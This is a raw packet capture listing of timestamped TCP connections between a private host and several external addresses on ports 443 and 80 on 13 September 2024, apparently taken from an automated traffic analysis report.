                                                        Sep 13, 2024 15:06:32.206523895 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.206541061 CEST49728443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.206549883 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.242749929 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243026018 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243084908 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.243103981 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243222952 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243294001 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.243305922 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243787050 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.243848085 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.243860006 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.244000912 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.244055033 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.244066000 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.244545937 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.244601011 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.244611979 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.251576900 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.251702070 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.251758099 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.251770973 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.251858950 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.251908064 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.251914978 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252012014 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252060890 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.252065897 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252159119 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252207041 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.252212048 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252317905 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.252367973 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.252372980 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.253803968 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.253871918 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.253885984 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.267134905 CEST44349728104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.267221928 CEST44349728104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.267283916 CEST49728443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.267829895 CEST49728443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.267843008 CEST44349728104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.267859936 CEST49728443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.267894030 CEST49728443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.269953012 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.269984007 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.270065069 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.270467997 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.270484924 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.310440063 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.310452938 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.310492992 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.334218025 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334326982 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334379911 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.334394932 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334469080 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334507942 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.334513903 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334585905 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334647894 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.334659100 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334777117 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334830999 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.334841967 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.334959984 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335015059 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.335026026 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335143089 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335190058 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.335201025 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335354090 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335423946 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.335434914 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335604906 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.335663080 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.335675001 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336055994 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336102009 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.336113930 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336281061 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336334944 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.336345911 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336479902 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.336534977 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.336544991 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.340856075 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.340902090 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.340907097 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.340914011 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.340967894 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.341059923 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.341145992 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.341193914 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.341201067 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.341296911 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.341342926 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.341347933 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342083931 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342127085 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342137098 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.342142105 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342190027 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.342195034 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342230082 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342406988 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.342413902 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342874050 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342925072 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.342928886 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.342967987 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.343007088 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.343019009 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.343024015 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.343065023 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.354753971 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.354943037 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.355000019 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.355005980 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.355133057 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.355197906 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.355202913 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.415183067 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.415183067 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.415231943 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425251961 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425281048 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425313950 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425338030 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.425375938 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425405979 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.425430059 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425447941 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425470114 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425492048 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.425510883 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.425530910 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.426306963 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426325083 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426364899 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.426378012 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426410913 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.426425934 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426460028 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426489115 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.426505089 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.426557064 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.427052021 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.427072048 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.427129984 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.427141905 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.427285910 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.427342892 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.428543091 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.428702116 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.428746939 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.428875923 CEST49727443192.168.2.5151.101.2.137
                                                        Sep 13, 2024 15:06:32.428909063 CEST44349727151.101.2.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.443627119 CEST49729443192.168.2.5104.17.24.14
                                                        Sep 13, 2024 15:06:32.443655968 CEST44349729104.17.24.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.484949112 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.485029936 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.485102892 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.485347033 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.485377073 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.486803055 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.486826897 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.486884117 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.487087011 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.487098932 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.573533058 CEST804971492.204.40.196192.168.2.5
                                                        Sep 13, 2024 15:06:32.573609114 CEST4971480192.168.2.592.204.40.196
                                                        Sep 13, 2024 15:06:32.632055998 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:32.652863979 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:32.652920961 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:32.656845093 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:32.656923056 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:32.657917023 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:32.658108950 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:32.658303976 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:32.658324003 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:32.733222008 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.736469984 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.736538887 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.737281084 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.737903118 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.737903118 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.737942934 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.738013983 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.809094906 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:32.841505051 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.879899025 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880024910 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880110025 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880122900 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.880135059 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880264044 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.880270958 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880351067 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880418062 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.880424023 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880510092 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880609035 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880644083 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.880650997 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.880707026 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.889067888 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.904885054 CEST49703443192.168.2.523.1.237.91
                                                        Sep 13, 2024 15:06:32.904886007 CEST49703443192.168.2.523.1.237.91
                                                        Sep 13, 2024 15:06:32.905391932 CEST49737443192.168.2.523.1.237.91
                                                        Sep 13, 2024 15:06:32.905431032 CEST4434973723.1.237.91192.168.2.5
                                                        Sep 13, 2024 15:06:32.905574083 CEST49737443192.168.2.523.1.237.91
                                                        Sep 13, 2024 15:06:32.906049013 CEST49737443192.168.2.523.1.237.91
                                                        Sep 13, 2024 15:06:32.906076908 CEST4434973723.1.237.91192.168.2.5
                                                        Sep 13, 2024 15:06:32.911279917 CEST4434970323.1.237.91192.168.2.5
                                                        Sep 13, 2024 15:06:32.911329985 CEST4434970323.1.237.91192.168.2.5
                                                        Sep 13, 2024 15:06:32.944307089 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.944752932 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.944766998 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.946191072 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.946400881 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.946868896 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.946868896 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:32.946945906 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:32.966263056 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966321945 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966367006 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.966371059 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966386080 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966459990 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966545105 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.966555119 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966568947 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.966656923 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.966687918 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.967252970 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.967293978 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.967336893 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.967369080 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.967377901 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.967420101 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.968056917 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968101025 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968132019 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.968138933 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968177080 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968208075 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.968215942 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968796015 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968835115 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.968868017 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.968873978 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.969115973 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.969122887 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.969537973 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.969710112 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.969786882 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.969831944 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.969926119 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.970045090 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.973987103 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.974035025 CEST49733443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:32.974050999 CEST44349733104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:32.989228010 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.989265919 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.992876053 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:32.993259907 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.993493080 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:32.993666887 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.000467062 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:33.000509977 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.002825022 CEST4971480192.168.2.592.204.40.196
                                                        Sep 13, 2024 15:06:33.007888079 CEST804971492.204.40.196192.168.2.5
                                                        Sep 13, 2024 15:06:33.015147924 CEST49739443192.168.2.5104.18.94.41
                                                        Sep 13, 2024 15:06:33.015221119 CEST44349739104.18.94.41192.168.2.5
                                                        Sep 13, 2024 15:06:33.015470028 CEST49739443192.168.2.5104.18.94.41
                                                        Sep 13, 2024 15:06:33.015562057 CEST49739443192.168.2.5104.18.94.41
                                                        Sep 13, 2024 15:06:33.015578032 CEST44349739104.18.94.41192.168.2.5
                                                        Sep 13, 2024 15:06:33.020979881 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:33.021147013 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:33.021315098 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:33.022080898 CEST49731443192.168.2.5188.114.96.3
                                                        Sep 13, 2024 15:06:33.022114992 CEST44349731188.114.96.3192.168.2.5
                                                        Sep 13, 2024 15:06:33.026319027 CEST49740443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:33.026366949 CEST44349740104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:33.026494980 CEST49740443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:33.026695013 CEST49740443192.168.2.5104.18.95.41
                                                        Sep 13, 2024 15:06:33.026721954 CEST44349740104.18.95.41192.168.2.5
                                                        Sep 13, 2024 15:06:33.036470890 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.036501884 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073791027 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073837996 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073873043 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073904037 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.073909044 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073923111 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.073935032 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.074013948 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.074513912 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.074606895 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.074645042 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.074670076 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.074676991 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.074783087 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.074788094 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.109225988 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.109261036 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.109453917 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:33.109492064 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.109523058 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.109555006 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:33.109569073 CEST44349734151.101.194.137192.168.2.5
                                                        Sep 13, 2024 15:06:33.109610081 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:33.109656096 CEST49734443192.168.2.5151.101.194.137
                                                        Sep 13, 2024 15:06:33.136825085 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.136835098 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.160547018 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.160660028 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.160744905 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.160778999 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.160810947 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.160861969 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.161384106 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.161472082 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.161596060 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.161676884 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.161679029 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.161701918 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.161736012 CEST49735443192.168.2.5104.17.25.14
                                                        Sep 13, 2024 15:06:33.162193060 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.162415028 CEST44349735104.17.25.14192.168.2.5
                                                        Sep 13, 2024 15:06:33.162457943 CEST49735443192.168.2.5104.17.25.14
